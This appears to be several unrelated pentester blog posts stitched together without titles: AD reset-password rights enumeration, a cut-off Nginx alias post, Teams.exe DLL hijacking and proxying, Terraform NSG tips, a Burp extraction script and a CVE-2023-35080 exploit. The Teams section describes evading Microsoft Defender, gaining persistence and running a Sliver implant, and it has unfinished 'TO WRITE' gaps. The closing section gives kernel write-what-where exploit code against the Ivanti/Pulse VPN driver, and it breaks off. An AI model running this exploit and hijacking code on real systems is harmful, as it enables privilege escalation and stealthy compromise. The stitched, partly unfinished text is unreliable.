Initial research

Firstly, I tracked the kinds of rights available for an Active Directory object. I checked it for a user.

I decided to focus on the ’Reset Password’ right.

Why the "Reset Password" right and not ’Change Password’ ?

With the Change Password right, it is possible to change a user’s password but the current password will be needed. With the ’Reset Password’ right, it is possible to reset the password without knowing the current one.

Another interesting right that would allow a user to reset someone else password is the Generic All right.

After few research, the GUID related to the right Reset Password was found to be : 00299570-246d-11d0-a768-00aa006e0529. The GUID related to the Generic All right was found to be : 00000000-0000-0000-0000-000000000000.

Query ACL objects

In order to query domain object for related ACL, the domain needs to be mounted as a drive. In fact, users are objects that acts like a file and have ACL.

The AD was mounted like so :

# Mount the AD as drive in order to get ACL on its objects
Write-Output "[+] Mount AD drive"
New-PSDrive -Name AD -PSProvider ActiveDirectory -Root "//RootDSE/" -Server $Server | Out-Null

ACL can then be queried like so :

Get-Acl "AD:\CN=TEST,OU=Users,DC=Lab,DC=LOCAL"

Query users and groups membership

User objects and related information can be retrieved like so :

Get-ADUser -Server $Server -Identity $User

Group where the user belongs to also need to be retrieved. It can be done like so :

(Get-ADUser -Server $Server -Identity $User -Properties MemberOf).MemberOf

Often groups belong to another group and so on. So it is interesting to recursively get all the groups where a group belongs to.

function Get-ADAllUserGroupMembership {
    <#
    .SYNOPSIS
    Recursively retrieve all the groups where a specified group belongs to.

    .EXAMPLE
    PS> Get-ADAllUserGroupMembership -Server 10.10.10.10 -GroupName custom_admin

    .PARAMETER Server
    Domain Controller where to run commands.

    .PARAMETER GroupName
    Group where the function will dig.

    #>

    [CmdletBinding()]
    param(
        [parameter(mandatory=$True)]
        [ValidateNotNullOrEmpty()]
        [string]$Server,
        [parameter(mandatory=$True)]
        [ValidateNotNullOrEmpty()]
        [string]$GroupName
    )

    $GroupMembership = @()

    $GroupObject = Get-ADGroup -Server $Server -Identity $GroupName -Properties MemberOf,objectSid

    [array]$GroupMembership += $GroupObject

    $GroupMemberObject = ($GroupObject).MemberOf

    if($GroupMemberObject.count -eq 0) {
        return $GroupMembership
    }

    foreach ($grp in $GroupMemberObject) {
        [array]$GroupMembership += Get-ADAllUserGroupMembership -Server $Server -GroupName $grp
    }

    return $GroupMembership | Sort-Object -Unique
}

Script

I compiled all this information to create a script that will find all the users where a specific user has the right to reset their password. I added multiple options to put multiple file as input. The script is also working on a non-domain joined machines.

function Get-ADAllUserGroupMembership {
    <#
    .SYNOPSIS
    Recursively retrieve all the groups where a specified group belongs to.

    .EXAMPLE
    PS> Get-ADAllUserGroupMembership -Server 10.10.10.10 -GroupName custom_admin

    .PARAMETER Server
    Domain Controller where to run commands.

    .PARAMETER GroupName
    Group where the function will dig.

    #>

    [CmdletBinding()]
    param(
        [parameter(mandatory=$True)]
        [ValidateNotNullOrEmpty()]
        [string]$Server,
        [parameter(mandatory=$True)]
        [ValidateNotNullOrEmpty()]
        [string]$GroupName
    )

    $GroupMembership = @()

    $GroupObject = Get-ADGroup -Server $Server -Identity $GroupName -Properties MemberOf,objectSid

    [array]$GroupMembership += $GroupObject

    $GroupMemberObject = ($GroupObject).MemberOf

    if($GroupMemberObject.count -eq 0) {
        return $GroupMembership
    }

    foreach ($grp in $GroupMemberObject) {
        [array]$GroupMembership += Get-ADAllUserGroupMembership -Server $Server -GroupName $grp
    }

    return $GroupMembership | Sort-Object -Unique
}

function Invoke-CheckResetUserPasswordRight {
    <#
    .SYNOPSIS
    Retrieve the users that the specified users are able to reset the password.

    .EXAMPLE
    PS> Invoke-CheckResetUserPasswordRight -Server 10.10.10.10 -Users User1
    PS> Invoke-CheckResetUserPasswordRight -Server 10.10.10.10 -Users User1 -Filter 'enabled -eq $true'
    PS> Invoke-CheckResetUserPasswordRight -Server 10.10.10.10 -Users User1 -Filter "Name -like '*user*'"
    PS> Invoke-CheckResetUserPasswordRight -Server 10.10.10.10 -Users User1,User2 -SearchBase "OU=Admins,DC=lab,DC=local"
    PS> Invoke-CheckResetUserPasswordRight -Server 10.10.10.10 -Users User1,User2,User3 -NoGroupCheck -OnlyResult

    .PARAMETER Server
    Domain Controller where to run commands.

    .PARAMETER Users
    List of users to check.

    .PARAMETER Filter
    Filter applied to the Get-AdUser function.

    .PARAMETER Filter
    Apply a search base to the function Get-AdUser.

    .PARAMETER OnlyResults
    Display only the samAccountName of users were specified users can reset the password.

    .PARAMETER OnlyResults
    Search only direct right to reset password and do not include groups of the user.

    #>

    [CmdletBinding()]
    [OutputType([hashtable])]
    param(
        [parameter(mandatory=$True)]
        [ValidateNotNullOrEmpty()]
        [string]$Server,
        [parameter(mandatory=$True)]
        [ValidateNotNullOrEmpty()]
        [array]$Users,
        [parameter(mandatory=$False)]
        [string]$Filter = "*",
        [parameter(mandatory=$False)]
        [ValidateNotNullOrEmpty()]
        [string]$SearchBase = "",
        [switch]$OnlyResults,
        [switch]$NoGroupCheck
    )

    try {
    Import-Module ActiveDirectory
    }
    catch {
    Write-Host "[!] Please install the ActiveDirectory module"
    return
    }

    $ResultRestPasswordRight = @()
    $objects = @()

    # Default values for ObjectType GUID - CN=User-Force-Change-Password,CN=Extended-Rights,CN=Configuration,DC=lab,DC=local
    $RestPasswordRight = "00299570-246d-11d0-a768-00aa006e0529"
    #$ChangePasswordRight = "ab721a53-1e2f-11d0-9819-00aa0040529b"
    $GenericAllRight = "00000000-0000-0000-0000-000000000000"


    # Mount the AD as drive in order to get ACL on its objects
    Write-Output "[+] Mount AD drive"
    New-PSDrive -Name AD -PSProvider ActiveDirectory -Root "//RootDSE/" -Server $Server | Out-Null

    # Get user information
    foreach ($User in $Users) {
        Echo "[+] Get User informations for $User"
        $userInfo = Get-ADUser -Server $Server -Identity $User -Properties MemberOf
        if ($userInfo -eq $null) {
            return
        }

        [array]$objects += $userInfo

        $userGroups = ($userInfo).MemberOf

        if ($NoGroupCheck.IsPresent -eq $True) {
            break
        }

        Write-Output "[+] Get groups for $User"
        ($userGroups) | ForEach-Object {
                [array]$objects += Get-ADAllUserGroupMembership -Server $Server -GroupName $_
        }

        if ($userGroups.count -ge 1) {
            Write-Output "[+] $User belongs to :"
            ($objects[1..($objects.Length-1)]) | ForEach-Object {
                Write-Output "   - [$($_.objectSid)] $($_.samAccountName)"
            }
         } else {
            Write-Output "    [+] $User does not belong to any group."
         }

        $objects = ($objects | Sort-Object -Unique)
    }

    Write-Output "[+] Get all users"
    if ($SearchBase -ne "") {
        $allUsers = Get-ADUser -Server $Server -Filter $Filter -SearchBase $SearchBase
    } else {
        $allUsers = Get-ADUser -Server $Server -Filter $Filter
    }

    Write-Output "[+] Run search on $($allUsers.count) users at $(Get-Date)"
    ($allUsers) | ForEach-Object {
        $targetUser = $_
        # Get ACL to reset password right

        try {
            $aclResetPassword = ((Get-Acl "AD:\$($targetUser.DistinguishedName)" | Select-object Access).access| Where-Object {$_.ObjectType -eq $RestPasswordRight -or $_.InheritedObjectType -eq $ResetPasswordRight -or $_.ObjectType -eq $GenericAllRight})
        }
        catch { }
        ($objects) | ForEach-Object {
            $object = $_
            $acl = $aclResetPassword | Where-Object {$_.IdentityReference -like "*$($object.SamAccountName)" -or $_.IdentityReference -eq $object.SID}
            if ($acl -ne $null) {
                $properties = @{
                    From = $object.samAccountName
                    PasswordResetRight = $true
                    User = $targetUser.samAccountName
                    UserIsEnabled = $targetUser.Enabled
                }
                $obj = New-Object -TypeName psobject -Property $properties
                $ResultRestPasswordRight += $obj
            }
        }
    }

    Write-Output "[+] Finished search on $($allUsers.count) users at $(Get-Date)"

    if ($OnlyResults -eq $True) {
        return ($ResultRestPasswordRight).User | Sort-Object -Unique
    }

    if ($ResultRestPasswordRight.Length -ge 1) {
        Write-Output "’r’n[+] CMD : Set-ADAccountPassword -Server $($Server) -identity User -Reset -NewPassword (ConvertTo-SecureString -AsPlainText 'Password' -Force)"
    }
    return $ResultRestPasswordRight
}

Examples

Considering an ’ITSupport’ user that has the right to reset the password of the user ’John Doe’.

The function accepts multiple users as input. A test can be run with the user ’Administrator.

Another situation is when a user belongs to group that belongs itself to another group. Let’s take the user ’Arnold Groot’ which belongs to the group ’IT Admin’. The group ’IT Admin’ belongs to the group ’Domain Admins’.

While reading some content about Web vulnerability, I came across a presentation of Orange Tsai at Black Hat : Breaking Parser Logic Take Your Path Normalization Off And Pop 0days out.

From page 17, the Nginx off-by-slash vulnerability is discussed.

Details

The vulnerability enters in the category of the misconfigurations, and it exploits a missing slash (/) in the alias directive to read files outside of the specified location.

The alias directive defines a replacement to access files. It is used like so :

location /static/ {
    alias /var/www/static/;
}

The application of this directive to a request will allow someone to request a resource within the static path. For example, for a website call example.com, the style.css resources located on disk at /var/www/static/style.css could be reached like so : http://example.com/static/style.css. To achieve the same goal, the root directive could have been used. However, the root directive appends the requested location to the given path where the alias directive replace it. The following configuration would have been used :

location /static/ {
    root /var/www/;
}

So we have the following behaviour :

| Directive | Requested URL | Nginx construction | |

From my tests with Teams.exe and Microsoft Defender, it seems that this binary has some pass rights and is less monitored. I was able to use malicious code that are flagged from other processes but not once injected into this process.

The idea was to create a DLL in Golang that would be ran transparently by Teams.exe. During an assessment, this vector could be used to keep persistence or gain code execution through a dropper that would put a malicious DLL along the Teams.exe binary.

In order to be as stealthy as possible, I wanted to create some tools that would automate the process of DLL Proxying. DLL Proxying is the idea to be in man-in-the-middle between the software program loading a DLL and the targeted DLL. The first tool I created was : https://github.com/HopHouse/SharpDLLProxy/. It allows to create a .c file that, once compiled, could be used to exploit a DLL hijacking vulnerability and proxy calls to the real DLL on system.

By creating a DLL that will "proxy" the calls to a DLL which exist, the process is almost transparent for the targeted software program. Furthermore, some software programs would reject a DLL if it does not export all the function it expects.

I wanted to execute a payload when the DLL is "attached" to a process. However, in Golang, such thing is not possible because there is no entry point to call the DLL when it is attached. As far as I read, it is linked to the Golang runtime which is initialised only if an exported function is explicitly called.

A trick exist by using C code to find this Main DLL function necessary to execute code when it is attached. This article will dive into it and create a DLL code that could be used to exploit a DLL hijacking vulnerability in Teams.exe.

For this test, I used Sliver to generate an implant. The generated malicious DLL downloads the implant code from the server, and execute it in memory.

Find the DLL hijacking issue

Using procmon, it was easy to spot some DLL hijacking possibility.

The next part of the article is focused on the ColorAdapterClient.dll but it could be used on any missing DLL.

Retrieve ColorAdapterClient.dll and create a .def file

On my system I found the DLL at C:\Windows\System32\coloradapterclient.dll.

Using CFF Explorer, it is possible to identify exported function of the DLL.

Create a DLL proxying code

I know 2 methods to do easy DLL proxying : pragma comment and .def files.

Pragma comment

The first is using pragma comment and was implemented in https://github.com/HopHouse/SharpDLLProxy/. For this DLL, it would produce :

The following code is produced :

// DLL Proxy
#include <windows.h>
#include <Shellapi.h>
#include <tchar.h>

#pragma comment(linker, "/export:ModernColorGetGDILutFromHDC=C:\\Windows\\System32\\coloradapterclient.ModernColorGetGDILutFromHDC,@1")
#pragma comment(linker, "/export:ModernColorSetGDILut=C:\\Windows\\System32\\coloradapterclient.ModernColorSetGDILut,@2")
#pragma comment(linker, "/export:ModernColorSetGDILutFromHDC=C:\\Windows\\System32\\coloradapterclient.ModernColorSetGDILutFromHDC,@3")
#pragma comment(linker, "/export:ModernColorSetLut=C:\\Windows\\System32\\coloradapterclient.ModernColorSetLut,@4")
#pragma comment(linker, "/export:ModernColorSetMatrix=C:\\Windows\\System32\\coloradapterclient.ModernColorSetMatrix,@5")
#pragma comment(linker, "/export:ModernColorSetMatrixFromHDC=C:\\Windows\\System32\\coloradapterclient.ModernColorSetMatrixFromHDC,@6")

BOOL APIENTRY DllMain( HMODULE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
                     )
{

    HANDLE threadHandle = NULL;
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
    {
        LPCSTR command = "calc.exe";
        WinExec(command, 0);
        break;
    }
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }

    return TRUE;
}

The pragma comment lines at the beginning are enough to do some DLL Proxying. However I did not succeed to use it and compile it with Golang. But, in C it is working very well.

.def files

.def files can be used to declare exported functions. Once transformed in .exp files, it is possible to use it to create DLL Proxying from Golang code.

I used the following script in order to generate the file automatically.

import pefile

target_location = "C:\\\\Windows\\\\System32\\\\coloradapterclient.dll"
location_without_dll = ".".join(target_location.split(".")[:-1])

local_location = "C:\\Windows\\System32\\coloradapterclient.dll"
dll = pefile.PE(local_location)

print("EXPORTS")
for export in dll.DIRECTORY_ENTRY_EXPORT.symbols:
    if export.name:
        print('{}=\"{}.{}\" @{}'.format(export.name.decode(), location_without_dll, export.name.decode(), export.ordinal))

It can be ran like this :

PS C:\Users\Auditor\Desktop\goStager> python.exe .\genDef-coloradaptater.py | out-file .\coloradapterclient.def -Encoding default

It created the following file :

EXPORTS
ModernColorGetGDILutFromHDC="C:\\Windows\\System32\\coloradapterclient.ModernColorGetGDILutFromHDC" @1
ModernColorSetGDILut="C:\\Windows\\System32\\coloradapterclient.ModernColorSetGDILut" @2
ModernColorSetGDILutFromHDC="C:\\Windows\\System32\\coloradapterclient.ModernColorSetGDILutFromHDC" @3
ModernColorSetLut="C:\\Windows\\System32\\coloradapterclient.ModernColorSetLut" @4
ModernColorSetMatrix="C:\\Windows\\System32\\coloradapterclient.ModernColorSetMatrix" @5
ModernColorSetMatrixFromHDC="C:\\Windows\\System32\\coloradapterclient.ModernColorSetMatrixFromHDC" @6

The following .def file can be converted to an .exp file like so :

PS C:\Users\Auditor\Desktop\goStager> dlltool --input-def .\coloradapterclient.def --output-exp coloradapterclient.exp

The .exp can be used during the compilation.

Create the Golang code

TO WRITE

Use Golang with C code to produce a DLL

TO WRITE

Compile the binary

The final binary can then be compiled with the go binary :

$> go build -buildmode=c-shared -ldflags '-w -s -H=windowsgui -extldflags=-Wl,C:/Users/Auditor/Desktop/Repository/goStager/coloradapterclient.exp' -o "coloradapterclient.dll" .

Sign the binary

Microsoft tools can be used in order to sign the binary. Also the carboncopy (https://github.com/paranoidninja/CarbonCopy) python script can be used to do so.

Long story short - Take away

In order to represent in Terraform for hashicorp/azurerm in version 3.109.0 and bellow :

• An empty set : prefer the usage of toset(null) instead of [].
• An empty/null string : prefer the usage of tostring(null) instead of "".

Details

When using a NSG rule object azurerm_network_security_rule, the source and address of a filtering rule can be set with 2 variables.

These variables are the prefix and prefixes where prefix expect a string containing a CIDR or a tag (*, VirtualNetwork, Internet, etc.) and prefixes expect a set of CIDR string.

It should be noted that prefixes does not handle tags.

Exemple of code to set rule based on a list of rules :

resource "azurerm_network_security_rule" "security_rule" {
  for_each                     = { for rule in var.list_nsg_rules : rule.name => rule }
  name                         = each.value.name
  priority                     = each.value.priority
  direction                    = each.value.direction
  access                       = each.value.access
  protocol                     = each.value.protocol
  source_address_prefixes      = each.value.source_address_prefixes
  source_port_range            = each.value.source_port_range
  destination_address_prefixes = each.value.destination_address_prefixes
  destination_port_ranges      = each.value.destination_port_ranges
  network_security_group_name  = each.value.network_security_group_name
  resource_group_name          = each.value.resource_group_name

  depends_on = [azurerm_network_security_group.security_group]
}

Within the following 2 set of variables, the variables prefix and prefixes cannot both contains non-null values.

For convenience, the NSG rules can be set into a CSV file like this one :

nsg_name,name,priority,direction,access,protocol,source_address_prefixes,source_port_range,destination_address_prefixes,destination_port_ranges
nsg001-rg001,allow-bastion-to-subnet-Tcp,2000,Inbound,Allow,Tcp,10.0.0.0/26,*,VirtualNetwork,22;3389
nsg002-rg001,allow-http-to-subnet,2001,Inbound,Allow,Tcp,*,*,10.1.1.0/24;10.2.2.0/24,80

This CSV shape allows the operator to include either a CIDR, a tag or multiple CIDR if separated by a semicolon (;).

Considering the terraform code we have 2 chose to either fill the prefix or prefixes settings because the CSV file has only one parameter that can contains both allowed and disallowed values for prefix and prefixes parameters.

To do so, it is possible to check the length of the value passed by the CSV in order to define if the values is a set or not. To do so, the length can be checked.

The following code can be used for the source_address_prefixes and is similar for destination_address_prefixes :

length(toset(flatten([for source_address in split(";", each.value.source_address_prefixes) : split(",", source_address)]))) == 1 ? each.value.source_address_prefixes : ""

The following code can be used for the source_address_prefix and is similar for destination_address_prefix :

length(toset(flatten([for source_address in split(";", each.value.source_address_prefixes) : split(",", source_address)]))) > 1 ? toset(flatten([for source_address in split(";", each.value.source_address_prefixes) : split(",", source_address)])) : []

Translated into the previous code :

resource "azurerm_network_security_rule" "security_rule" {
    for_each                     = { for rule in var.list_nsg_rules : rule.name => rule }

    name                         = each.value.name
    priority                     = each.value.priority
    direction                    = each.value.direction
    access                       = each.value.access
    protocol                     = each.value.protocol
    source_address_prefix        = length(toset(flatten([for source_address in split(";", each.value.source_address_prefixes) : split(",", source_address)]))) == 1 ? each.value.source_address_prefixes : tostring(null)
    source_address_prefixes      = length(toset(flatten([for source_address in split(";", each.value.source_address_prefixes) : split(",", source_address)]))) > 1 ? toset(flatten([for source_address in split(";", each.value.source_address_prefixes) : split(",", source_address)])) : toset(null)
    source_port_range            = each.value.source_port_range
    destination_port_ranges      = each.value.destination_port_ranges == "*" ? ["0-65535"] : (each.value.destination_port_ranges == "" ? [] : toset(flatten([for port_str in split(";", each.value.destination_port_ranges) : split(",", port_str)])))
    destination_address_prefix   = length(toset(flatten([for destination_address in split(";", each.value.destination_address_prefixes) : split(",", destination_address)]))) == 1 ? each.value.destination_address_prefixes : tostring(null)
    destination_address_prefixes = length(toset(flatten([for destination_address in split(";", each.value.destination_address_prefixes) : split(",", destination_address)]))) > 1 ? toset(flatten([for destination_address in split(";", each.value.destination_address_prefixes) : split(",", destination_address)])) : toset(null)
    network_security_group_name  = each.value
    resource_group_name          = tostring(split("-", each.value)[1])

    depends_on = [azurerm_network_security_group.security_group]
}

But this would not work, because Terraform would yield some errors with prefix and prefixes values both set

Using the terraform console -plan command, it is possible to check created values and observe that :

• When prefix values are not set, Terraform set the value at tostring(null).
• When prefixes values are not set, Terraform set the value at tostring(null).

The code was transformed to match Terraform expectations :

resource "azurerm_network_security_rule" "security_rule" {
    for_each                     = { for rule in var.list_nsg_rules : rule.name => rule }

    name                         = each.value.name
    priority                     = each.value.priority
    direction                    = each.value.direction
    access                       = each.value.access
    protocol                     = each.value.protocol
    source_address_prefix        = length(toset(flatten([for source_address in split(";", each.value.source_address_prefixes) : split(",", source_address)]))) == 1 ? each.value.source_address_prefixes : tostring(null)
    source_address_prefixes      = length(toset(flatten([for source_address in split(";", each.value.source_address_prefixes) : split(",", source_address)]))) > 1 ? toset(flatten([for source_address in split(";", each.value.source_address_prefixes) : split(",", source_address)])) : toset(null)
    source_port_range            = each.value.source_port_range
    destination_port_ranges      = each.value.destination_port_ranges == "*" ? ["0-65535"] : (each.value.destination_port_ranges == "" ? [] : toset(flatten([for port_str in split(";", each.value.destination_port_ranges) : split(",", port_str)])))
    destination_address_prefix   = length(toset(flatten([for destination_address in split(";", each.value.destination_address_prefixes) : split(",", destination_address)]))) == 1 ? each.value.destination_address_prefixes : tostring(null)
    destination_address_prefixes = length(toset(flatten([for destination_address in split(";", each.value.destination_address_prefixes) : split(",", destination_address)]))) > 1 ? toset(flatten([for destination_address in split(";", each.value.destination_address_prefixes) : split(",", destination_address)])) : toset(null)
    network_security_group_name  = each.value
    resource_group_name          = tostring(split("-", each.value)[1])

    depends_on = [azurerm_network_security_group.security_group]
}

Conclusion

So, it is not intuitive but for terraform with the hashicorp/azurerm version 3.109.0 and bellow :

• "" might not equivalent to a null/empty string and tostring(null) must be preferred ;
• [] might not equivalent to an empty set and toset(null) must be preferred.

Burp export a file containing XML with both the request and the response base64 encoded. The document is like so :

<?xml version="1.0"?>
<!DOCTYPE items [
<!ELEMENT items (item*)>
<!ATTLIST items burpVersion CDATA "">
<!ATTLIST items exportTime CDATA "">
<!ELEMENT item (time, url, host, port, protocol, method, path, extension, request, status, responselength, mimetype, response, comment)>
<!ELEMENT time (#PCDATA)>
<!ELEMENT url (#PCDATA)>
<!ELEMENT host (#PCDATA)>
<!ATTLIST host ip CDATA "">
<!ELEMENT port (#PCDATA)>
<!ELEMENT protocol (#PCDATA)>
<!ELEMENT method (#PCDATA)>
<!ELEMENT path (#PCDATA)>
<!ELEMENT extension (#PCDATA)>
<!ELEMENT request (#PCDATA)>
<!ATTLIST request base64 (true|false) "false">
<!ELEMENT status (#PCDATA)>
<!ELEMENT responselength (#PCDATA)>
<!ELEMENT mimetype (#PCDATA)>
<!ELEMENT response (#PCDATA)>
<!ATTLIST response base64 (true|false) "false">
<!ELEMENT comment (#PCDATA)>
]>
<items burpVersion="2022.12.4" exportTime="Mon Dec 12 10:00:00 CET 2022">
  <item>
    <time>Mon Dec 12 10:00:00 CET 2022</time>
    <url><![CDATA[https://domain.tld/documents/15008/download/]]></url>
    <host ip="X.X.X.X">domain.tld</host>
    <port>443</port>
    <protocol>https</protocol>
    <method><![CDATA[GET]]></method>
    <path><![CDATA[/documents/15008/download/]]></path>
    <extension>null</extension>
    <request base64="true"><![CDATA[REDACTED]]></request>
    <status>200</status>
    <responselength>35419</responselength>
    <mimetype></mimetype>
    <response base64="true"><![CDATA[REDACTED]]></response>
    <comment></comment>
  </item>
</items>

In order to extract the files from it, I used the following script ugly script.

import base64
import re
import xml.etree.ElementTree as ET

# Variables
path = 'document-download.burp'
output_path = './extracted/'

def main():
    # Parse Burp file
    mytree = ET.parse(path)
    myroot = mytree.getroot()

    # Search through each item in the file
    for item in myroot.findall('item'):
        try:
            # Retreive the response
            based = (item.find('response').text)

            # Decode the response
            data = base64.b64decode(based)

            # Retrieve the headers from the response
            headers = data.split(b'\r\n\r\n')[0]

            # Retrieve the content from the response
            content = data.split(b'\r\n\r\n')[1]

            # Extract the filename from the response headers
            regex_expression = r'filename=(?:\")?([a-zA-Z0-9\-\_\.\_]*)(?:\")?'
            filenames = re.findall(regex_expression, headers.decode("utf-8"))
            if len(filenames) <= 0 :
                raise Exception("No filename was identified")

            # Get the first match
            filename = filenames[0]

            # Generate the output path
            output_name = output_path + filename
            print (f"[+] Extracted : {filename}")

            # Write the body to a file using extracted filename
            f = open(output_name, "wb")
            f.write(content)
            f.close()

        # If something goes wrong, print the exception
        except Exception as e:
            print(e)

if __name__ == "__main__":
    main()

The script is using the filename value out of the Content-Disposition HTTP header of the response.

• CVE-2023-38043
• CVE-2023-35080
• CVE-2023-38543

A few technical details were shared in the following article : https://northwave-cybersecurity.com/ivanti-pulse-vpn-privilege-escalation and were very usefull to build an exploit.

Following it and experimenting, it was possible to build a working exploit for CVE-2023-35080. It allows a normal user to exploit a write primitive in the Ivanti/Pulse VPN client windows driver in order to elevate privileges.

Full code exploiting the CVE-2023-35080 can be retrieved in the dedicated Github repository : https://github.com/HopHouse/Ivanti-Pulse_VPN-Client_Exploit-CVE-2023-35080_Privilege-escalation.

Main code

The following code was used to exploit the vulnerability :

#include "main.h"

void write_byte(void* arg)
{
    Sleep(100);

    WRITE_WHAT_WHERE_BYTE* bv = (WRITE_WHAT_WHERE*)arg;

    BOOL res1 = SetThreadPriority(
        GetCurrentThread(),
        THREAD_MODE_BACKGROUND_BEGIN
    );
    if (res1 == 0) {
        printf("[!][write_byte][%d - %d] Error while setting the thread priority\n", bv->id, bv->threadId);
    }

    size_t returned_bytes;
    uint64_t* input_buffer = calloc(0x100, 1);
    uint64_t* initial_buffer = calloc(0x100, 1);
    uint64_t* buff_30h = calloc(0x100, 1);
    uint64_t* iocsq_rsi_plus_8h = calloc(0x100, 1);

    /*
     *  Configuring the pointer to hold the byte we want to write
     *  in the LSB. -0x50 at the end to compensate for the +0x50
     *  that is done inside the driver code
     */
    uint64_t* buff_28h = ((uint8_t*)VirtualAlloc(NULL, 0x1000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE)) + 0x100 + bv->what - 0x50;


    input_buffer[0] = initial_buffer;

    initial_buffer[0x28 / sizeof(uint64_t)] = buff_28h;
    initial_buffer[0x30 / sizeof(uint64_t)] = buff_30h;

    iocsq_rsi_plus_8h[0] = bv->where;
    iocsq_rsi_plus_8h[0x68 / sizeof(uint64_t)] = 1;
    iocsq_rsi_plus_8h[0x18 / sizeof(uint64_t)] = 1; // Required to pass a check in write_char_0
    iocsq_rsi_plus_8h[0x08 / sizeof(uint64_t)] = 0x1000; // Required to pass a check in write_char_0

    buff_30h[(0x08 / sizeof(uint64_t))] = iocsq_rsi_plus_8h;
    buff_28h[(0x50 / sizeof(uint64_t))] = bv->id; // Locked spin lock object

    uint64_t ntoskrnl_base = 0;
    GetKernelBase(&ntoskrnl_base);

    //uint64_t HalMakeBeepOffset = 0;
    //GetFunctionOffset("HalMakeBeep", &HalMakeBeepOffset);

    //uint64_t KeAcquireQueuedSpinLockOffset = 0;
    //GetFunctionOffset("KeAcquireQueuedSpinLock", &KeAcquireQueuedSpinLockOffset);

    /*
     *  Setting Function pointers
     */
    buff_28h[(0x50 / sizeof(uint64_t)) + (0x20 / sizeof(uint64_t))] = ntoskrnl_base + TRY_SPIN_OFFSET;
    buff_28h[(0x50 / sizeof(uint64_t)) + (0x10 / sizeof(uint64_t))] = ntoskrnl_base + WRITE_CHAR_OFFSET;
    buff_28h[(0x50 / sizeof(uint64_t)) + (0x28 / sizeof(uint64_t))] = ntoskrnl_base + SPIN_OFFSET;

    DeviceIoControl(bv->hdev, VULN_IOCTL, input_buffer, 0x100, NULL, 0, &returned_bytes, NULL);
    printf("[!][write_byte][%d - %d] This printf will never execute, unless we manually lift and fix the spinlock, Unfortunately this has executed : hdev : 0x%p - what : 0x%02X - where : 0x%llX\n", bv->id, bv->threadId, bv->hdev, bv->what, bv->where);
}

void write_mem(WRITE_WHAT_WHERE* bv)
{
    printf("[+][write_mem] Trying to write :\n\tdevicePath : %ws\n\twhat : 0x%llX\n\twhere : 0x%llX\n", bv->devicePath, bv->what, bv->where);

    HANDLE threads[8] = { NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL };
    DWORD   dwThreadIdArray[MAX_THREADS];
    HANDLE  hThreadArray[MAX_THREADS];

    PWRITE_WHAT_WHERE_BYTE what_write_where_array[MAX_THREADS];

    // Retrive all the 4 bytes of the 64-bytes
    uint8_t what_uint8[] = { 0, 0, 0, 0, 0, 0, 0, 0 };

    what_uint8[0] = (uint8_t)((bv->what & 0x00000000000000FF));
    what_uint8[1] = (uint8_t)((bv->what & 0x000000000000FF00) >> 8);
    what_uint8[2] = (uint8_t)((bv->what & 0x0000000000FF0000) >> 16);
    what_uint8[3] = (uint8_t)((bv->what & 0x00000000FF000000) >> 24);
    what_uint8[4] = (uint8_t)((bv->what & 0x000000FF00000000) >> 32);
    what_uint8[5] = (uint8_t)((bv->what & 0x0000FF0000000000) >> 40);
    what_uint8[6] = (uint8_t)((bv->what & 0x00FF000000000000) >> 48);
    what_uint8[7] = (uint8_t)((bv->what & 0xFF00000000000000) >> 56);

    uint8_t what_uint8_size = (sizeof(what_uint8) / sizeof(uint8_t));

    for (int i = 0; i < what_uint8_size; i++) {
        what_write_where_array[i] = (PWRITE_WHAT_WHERE_BYTE)HeapAlloc(
            GetProcessHeap(),
            HEAP_ZERO_MEMORY,
            sizeof(WRITE_WHAT_WHERE_BYTE)
        );
        if (what_write_where_array[i] == NULL) {
            printf("[!][write_mem][%d] Could not allocate the HEAP. Testing next thread.\n", i);
            continue;
        }

        // Open the handle
        HANDLE hDevice = NULL;
        OpenDevice(&hDevice, bv->devicePath);

        what_write_where_array[i]->id = i;
        what_write_where_array[i]->threadId = 0;
        what_write_where_array[i]->hdev = hDevice;
        what_write_where_array[i]->where = bv->where + (uint64_t)(i * sizeof(uint8_t));
        what_write_where_array[i]->what = what_uint8[i];
    }

    for (int i = 0; i < what_uint8_size; i++) {

        DWORD dwThreadId = 0;

        hThreadArray[i] = CreateThread(
            NULL,                               // default security attributes
            0,                                  // use default stack size  
            write_byte,                         // thread function name
            what_write_where_array[i],          // argument to thread function 
            CREATE_SUSPENDED,                   // Create the thread in the default state
            &dwThreadIdArray[i]                 // returns the thread identifier
        );

        if (hThreadArray[i] == NULL) {
            printf("[!][write_mem][%d - %d] Error while creating the thread\n", i, dwThreadIdArray[i]);
            ExitProcess(3);
        }

        what_write_where_array[i]->threadId = dwThreadIdArray[i];
    }

    for (int i = 0; i < what_uint8_size; i++) {


        //printf("[+][write_mem][%d - %d] Resuming thread\n", i, dwThreadIdArray[i]);
        DWORD res2 = ResumeThread(
            hThreadArray[i]
        );
        if (res2 == -1) {
            printf("[!][write_mem][%d - %d]  Error resuming thread\n", i, dwThreadIdArray[i]);
        }
    }

    printf("[+][write_mem] Wait for thread to complete\n");
    Sleep(20000);
}

int wmain(int argc, wchar_t* argv[])
{
    printf("[+] Strating program\n");

    // Allocate memory which will hold the device path
    LPCWSTR devicePath = (LPWSTR)HeapAlloc(
        GetProcessHeap(),
        HEAP_ZERO_MEMORY,
        (MAX_PATH + 1) * sizeof(WCHAR)
    );
    if (devicePath == NULL) {
        PrintError(TEXT("malloc devicePath"));
        return;
    }

    if (argc == 2) {
        swprintf_s(devicePath, MAX_PATH, L"\\\\.\\%ws", argv[1]);
    }
    else {
        swprintf_s(devicePath, MAX_PATH, L"\\\\.\\%ws", DEVICE_NAME_W);
    }

    // 1. Opening the token of the current process
    HANDLE hToken = NULL;
    OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken);
    printf("[+] Current process token address : 0x%p\n", hToken);

    // 2. Finding the kernel pointer for this token object using the SystemExtendedHandleInformation class in the NtQuerySystemInformation API.
    PVOID token_ptr = GetObjectPointedByHandle(hToken);
    printf("[+] Kernel pointer for the token as PVOID  : 0x%p\n", token_ptr);

    // 3. Use the write primitive to overwrite the TOKEN->_SEP_TOKEN_PRIVILEGES->Enabled
    // and TOKEN->_SEP_TOKEN_PRIVILEGES->Present fields to grant system level privileges to our process.
